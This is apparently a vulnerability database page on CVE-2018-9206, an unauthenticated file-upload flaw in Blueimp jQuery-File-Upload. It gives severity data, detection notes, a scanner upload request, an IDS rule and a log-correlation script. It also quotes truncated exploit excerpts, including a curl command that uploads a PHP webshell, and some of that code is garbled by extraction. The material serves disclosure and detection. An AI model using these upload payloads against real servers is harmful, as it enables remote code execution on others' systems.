CVE-2018-9206
Published 2018-10-11
CVE-2018-9206: Unauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Upload <= v9.22.0
Priority: P193 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 97.11% (99.9th percentile)
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| blueimp | blueimp_jquery-file-upload | unspecified – 9.22.0 | — |
| debian | libjs-jquery-file-upload | < libjs-jquery-file-upload 9.25.0-1 (bookworm) | libjs-jquery-file-upload 9.25.0-1 (bookworm) |
| jquery_file_upload_project | jquery_file_upload | <= 9.22.0 | — |
Detection & IOCs
yara

```yaml
id: CVE-2018-9206
http:
  - raw:
      - |
        POST {{path}} HTTP/1.1
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}
        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="files[]"; filename="{{filename}}.php"
        Content-Type: application/x-php
    matchers:
      - type: dsl
        dsl:
          - "contains(body, '{{md5(hash)}}')"
          - "status_code == 200"
        condition: and
```

- Look for multipart/form-data POST requests uploading .php files to known jQuery File Upload handler paths (server/php/index.php, example/upload.php, php/index.php, server/php/UploadHandler.php, server/php/upload.class.php). The Content-Disposition header will contain filename="*.php" and Content-Type: application/x-php.
- After upload, attackers probe for the uploaded PHP webshell under the /files/ subdirectory relative to the upload handler path (e.g., GET /server/php/files/<filename>.php). Monitor for GET requests to these paths returning HTTP 200.
- The exploit uses a distinctive User-Agent string. Correlate HTTP logs for this UA combined with POST requests to jQuery File Upload handler paths.
- The vulnerability is triggered because Apache 2.3.9+ ignores .htaccess files in the upload directory when AllowOverride is set to None, allowing PHP files to be executed. Check Apache configuration for AllowOverride None in directories served by the jQuery File Upload plugin.
- The exploit script probes for bower.json and package.json to fingerprint the plugin version before exploitation. Monitor for sequential GET requests to bower.json or package.json followed by POST to upload handler paths.
- The exploit also checks for index.html to detect the plugin's GUI. Monitor for GET requests to /index.html that contain 'jquery file upload' in the response, followed by upload attempts.
- The vulnerability is only exploitable on Apache web servers running version 2.3.9 or later where AllowOverride is set to None (or equivalent), causing the plugin's .htaccess security restrictions to be ignored. Servers with AllowOverride All or explicit directory restrictions may not be exploitable via this path.
- Over 7,800 forks of the jQuery File Upload plugin on GitHub are likely also vulnerable. Detection and patching efforts must account for forked/derivative implementations, not just the canonical blueimp repository.
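The log correlation described in the detection notes above, as an added example (not part of the original page or of any project it references): it walks access-log lines in combined log format and flags a client that POSTs to one of the listed handler paths and then receives HTTP 200 for a .php file under that handler's files/ directory. The log lines, IP addresses, the /upload/ install path and all function and field names are assumptions made for the illustration.

```python
import re
from collections import defaultdict

# Upload handler paths listed in the detection notes on this page.
HANDLERS = tuple("/" + p for p in (
    "server/php/index.php", "example/upload.php", "php/index.php",
    "server/php/UploadHandler.php", "server/php/upload.class.php"))
PROBES = ("/bower.json", "/package.json")  # version fingerprinting requests
# Combined log format: client, method, URI and status are all this check needs.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def correlate(lines):
    """Flag clients that POST to a handler, then get 200 for a .php under its files/ dir."""
    state = defaultdict(lambda: {"probed": False, "dirs": set()})
    findings = []
    for raw in lines:
        m = LINE.match(raw)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, uri, status = m.group(1), m.group(2), m.group(3), int(m.group(4))
        path = uri.split("?", 1)[0]
        seen = state[ip]
        if method == "GET" and path.endswith(PROBES):
            seen["probed"] = True
        elif method == "POST" and path.endswith(HANDLERS):
            seen["dirs"].add(path.rsplit("/", 1)[0] + "/files/")
        elif method == "GET" and status == 200 and path.lower().endswith(".php"):
            if any(path.startswith(d) for d in seen["dirs"]):
                findings.append({"client": ip, "script": path,
                                 "fingerprinted": seen["probed"]})
    return findings

# Constructed sample log lines (documentation-range IPs, hypothetical /upload/ install path).
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Oct/2018:10:00:01 +0000] "GET /upload/package.json HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.7 - - [11/Oct/2018:10:00:02 +0000] "POST /upload/server/php/index.php HTTP/1.1" 200 301 "-" "-"',
    '203.0.113.7 - - [11/Oct/2018:10:00:03 +0000] "GET /upload/server/php/files/a1b2.php HTTP/1.1" 200 32 "-" "-"',
    '198.51.100.9 - - [11/Oct/2018:10:05:00 +0000] "POST /upload/server/php/index.php HTTP/1.1" 200 288 "-" "-"',
    '198.51.100.9 - - [11/Oct/2018:10:05:01 +0000] "GET /upload/server/php/files/photo.jpg HTTP/1.1" 200 9000 "-" "-"',
    '192.0.2.4 - - [11/Oct/2018:10:09:00 +0000] "POST /upload/php/index.php HTTP/1.1" 200 290 "-" "-"',
    '192.0.2.4 - - [11/Oct/2018:10:09:01 +0000] "GET /upload/php/files/x.php HTTP/1.1" 403 199 "-" "-"',
]

if __name__ == "__main__":
    for finding in correlate(SAMPLE_LOG):
        print(finding)
```

The 403 in the last sample line stands for a server where the upload directory's restrictions are still enforced, so that client is not reported; only the upload followed by a 200 on the uploaded script is.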
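CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| osv | | 9.8 | CRITICAL | |
| vulncheck | | 9.8 | CRITICAL | |
| vendor_debian | | 9.8 | CRITICAL | |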
OSV
Unrestricted Upload of File with Dangerous Type in blueimp-file-upload
osv·2018-10-22
CVE-2018-9206 [CRITICAL] Unrestricted Upload of File with Dangerous Type in blueimp-file-upload
Unauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Upload <= v9.22.0
GHSA
Unrestricted Upload of File with Dangerous Type in blueimp-file-upload
ghsa·2018-10-22
CVE-2018-9206 [CRITICAL] CWE-434 Unrestricted Upload of File with Dangerous Type in blueimp-file-upload
Unauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Upload <= v9.22.0
OSV
CVE-2018-9206: Unauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Upload <= v9
osv·2018-10-11·CVSS 9.8
CVE-2018-9206 [CRITICAL] CVE-2018-9206: Unauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Upload <= v9
Unauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Upload <= v9.22.0
VulnCheck
jquery_file_upload_project jquery_file_upload Unrestricted Upload of File with Dangerous Type
vulncheck·2018·CVSS 9.8
CVE-2018-9206 [CRITICAL] jquery_file_upload_project jquery_file_upload Unrestricted Upload of File with Dangerous Type
Unauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Upload <= v9.22.0
Affected: jquery_file_upload_project jquery_file_upload
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2018-9206; https://www.imperva.com/blog/crimeops-of-the-kashmirblack-botnet-part-ii/; https://www.akamai.com/blog/security/what-happens-when-your-vulnerability-is-weaponized-for-botnet-proliferation; https://app.crowdsec.net/cti/cve-explorer/CVE-2018-9206
Exploit PoC: https://vulncheck.com/xdb/e812f9642840; https:
Debian
CVE-2018-9206: libjs-jquery-file-upload - Unauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Uploa...
vendor_debian·2018·CVSS 9.8
CVE-2018-9206 [CRITICAL] CVE-2018-9206: libjs-jquery-file-upload - Unauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Uploa...
Unauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Upload <= v9.22.0
Scope: local
bookworm: resolved (fixed in 9.25.0-1)
bullseye: resolved (fixed in 9.25.0-1)
forky: resolved (fixed in 9.25.0-1)
sid: resolved (fixed in 9.25.0-1)
trixie: resolved (fixed in 9.25.0-1)
Suricata
ET WEB_SERVER jQuery File Upload Attempt
suricata·2018-10-25·CVSS 9.8
CVE-2018-9206 [CRITICAL] ET WEB_SERVER jQuery File Upload Attempt
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER jQuery File Upload Attempt"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/php/"; http.request_body; content:"name=|22|files|22 3b|"; content:"<?php"; nocase; reference:url,github.com/lcashdol/Exploits/tree/master/CVE-2018-9206; reference:cve,2018-9206; classtype:web-application-attack; sid:2026552; rev:4; metadata:affected_product PHP, attack_target Server, created_at 2018_10_25, cve CVE_2018_9206, deployment Datacenter, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_08_27;)
Exploit-DB
Blueimp's jQuery File Upload 9.22.0 - Arbitrary File Upload Exploit
exploitdb·2019-01-16·CVSS 9.8
CVE-2018-9206 [CRITICAL] Blueimp's jQuery File Upload 9.22.0 - Arbitrary File Upload Exploit
---
# Exploit Title: Exploit for Blueimp's jQuery File Upload
#include
#include
#include
#include
#include
#include
#define BSIZE 1024
#define DEBUG 1
#define TESTONLY 0
void build_string (char *p, char *path, char *arg, char *ar1, int func);
int
main (int argc, char *argv[])
{
int sock = 0, bytes_read = 0, total = 0, function = 0;
struct sockaddr_in serv_addr;
char buffer[BSIZE] = { 0 }, payload[BSIZE] = { 0};
if (argc \r\n\r\n--------------------------c8e05c8871143853--\r\n\r\n",path, arg);
}
Exploit-DB
blueimp's jQuery 9.22.0 - (Arbitrary) File Upload (Metasploit)
exploitdb·2018-11-06·CVSS 9.8
CVE-2018-9206 [CRITICAL] blueimp's jQuery 9.22.0 - (Arbitrary) File Upload (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule "blueimp's jQuery (Arbitrary) File Upload",
'Description' => %q{
This module exploits an arbitrary file upload in the sample PHP upload
handler for blueimp's jQuery File Upload widget in versions [
'Claudio Viviani', # WordPress Work the Flow (Arbitrary) File Upload
'Larry W. Cashdollar', # (Re)discovery, vendor disclosure, and PoC
'wvu' # Metasploit module
],
'References' => [
['CVE', '2018-9206'],
['URL', 'http://www.vapidlabs.com/advisory.php?v=204'],
['URL', 'https://github.com/blueimp/jQuery-File-Upload/pull/3514'],
['URL', 'https://github.com/lcashdol/Explo
Exploit-DB
jQuery-File-Upload 9.22.0 - Arbitrary File Upload
exploitdb·2018-10-11·CVSS 9.8
CVE-2018-9206 [CRITICAL] jQuery-File-Upload 9.22.0 - Arbitrary File Upload
---
# Title: jQuery-File-Upload 9.22.0 - Arbitrary File Upload
# Author: Larry W. Cashdollar, @_larry0
# Date: 2018-10-09
# Vendor: https://github.com/blueimp
# Download Site: https://github.com/blueimp/jQuery-File-Upload/releases
# CVE-ID: N/A
# Vulnerability:
# The code in https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php
# doesn't require any validation to upload files to the server. It also doesn't exclude file types.
# This allows for remote code execution.
# shell.php:
# Exploit Code:
$ curl -F "[email protected]" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php
#!/bin/bash
USERAGENT="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
PATHS=("server/p
Metasploit
blueimp's jQuery (Arbitrary) File Upload
metasploit
This module exploits an arbitrary file upload in the sample PHP upload handler for blueimp's jQuery File Upload widget in versions <= 9.22.0. Due to a default configuration in Apache 2.3.9+, the widget's .htaccess file may be disabled, enabling exploitation of this vulnerability. This vulnerability has been exploited in the wild since at least 2015 and was publicly disclosed to the vendor in 2018. It has been present since the .htaccess change in Apache 2.3.9. This module provides a generic exploit against the jQuery widget.
Nuclei
Blueimp jQuery-File-Upload v9.22.0 - Unrestricted File Upload
nuclei·CVSS 9.8
CVE-2018-9206 [CRITICAL] Blueimp jQuery-File-Upload v9.22.0 - Unrestricted File Upload
Blueimp jQuery-File-Upload v9.22.0 contains an unauthenticated arbitrary file upload caused by insufficient validation in the upload component, letting remote attackers upload malicious files, exploit requires no authentication.
Template:
```yaml
id: CVE-2018-9206
info:
  name: Blueimp jQuery-File-Upload v9.22.0 - Unrestricted File Upload
  author: thewindghost
  severity: critical
  description: |
    Blueimp jQuery-File-Upload v9.22.0 contains an unauthenticated arbitrary file upload caused by insufficient validation in the upload component, letting remote attackers upload malicious files, exploit requires no authentication.
  impact: |
    Attackers can upload malicious files, potentially leading to remote code execution or server compromise.
  reme
```
Tenable
jQuery File Upload Plugin Leaves Web Servers Vulnerable to Unauthenticated File Upload Attacks
blogs_tenable·2018-10-19·CVSS 9.8
[CRITICAL] jQuery File Upload Plugin Leaves Web Servers Vulnerable to Unauthenticated File Upload Attacks
# jQuery File Upload Plugin Leaves Web Servers Vulnerable to Unauthenticated File Upload Attacks
Ryan Seguin
October 19, 2018
Akamai disclosed that the popular jQuery File Upload plugin has been vulnerable to an unauthenticated file upload flaw since November 2010.
## Background
Akamai’s Security Intelligence Response Team (SIRT) recently disclosed that the popular jQuery File Upload plugin, the second most-starred plugin on GitHub in the jQuery project, has been vulnerable to an unauthenticated file upload flaw (CVE-2018-9206) on Apache web servers since November 2010.
## Impact assessment
Larry Cashdollar, a security researcher for Akamai's SIRT, said in an interview with ZDNet that he’s seen active exploitation of this vulne
Bugzilla
CVE-2018-9206 js-jquery-file-upload: Unauthenticated arbitrary file upload
bugzilla·2018-10-11·CVSS 9.8
CVE-2018-9206 [CRITICAL] CVE-2018-9206 js-jquery-file-upload: Unauthenticated arbitrary file upload
The code in https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php doesn't require any validation to upload files to the server. It also doesn't exclude file types. This allows for remote code execution.
Upstream patch:
https://github.com/blueimp/jQuery-File-Upload/pull/3514
References:
http://www.vapidlabs.com/advisory.php?v=204
Discussion:
Created js-jquery-file-upload tracking bugs for this issue:
Affects: fedora-all [bug 1638551]
---
This CVE Bugzilla entry is for community support informational purposes only as it does not affect a package in a commercially supported Red Hat product. Refer to the dependent bugs for status of those individual community products.
Bugzilla
CVE-2018-9206 js-jquery-file-upload: Unauthenticated arbitrary file upload [fedora-all]
bugzilla·2018-10-11·CVSS 9.8
CVE-2018-9206 [CRITICAL] CVE-2018-9206 js-jquery-file-upload: Unauthenticated arbitrary file upload [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supporte
References
- http://www.securityfocus.com/bid/105679
- http://www.securityfocus.com/bid/106629
- http://www.vapidlabs.com/advisory.php?v=204
- https://wpvulndb.com/vulnerabilities/9136
- https://www.exploit-db.com/exploits/45790/
- https://www.exploit-db.com/exploits/46182/
- https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html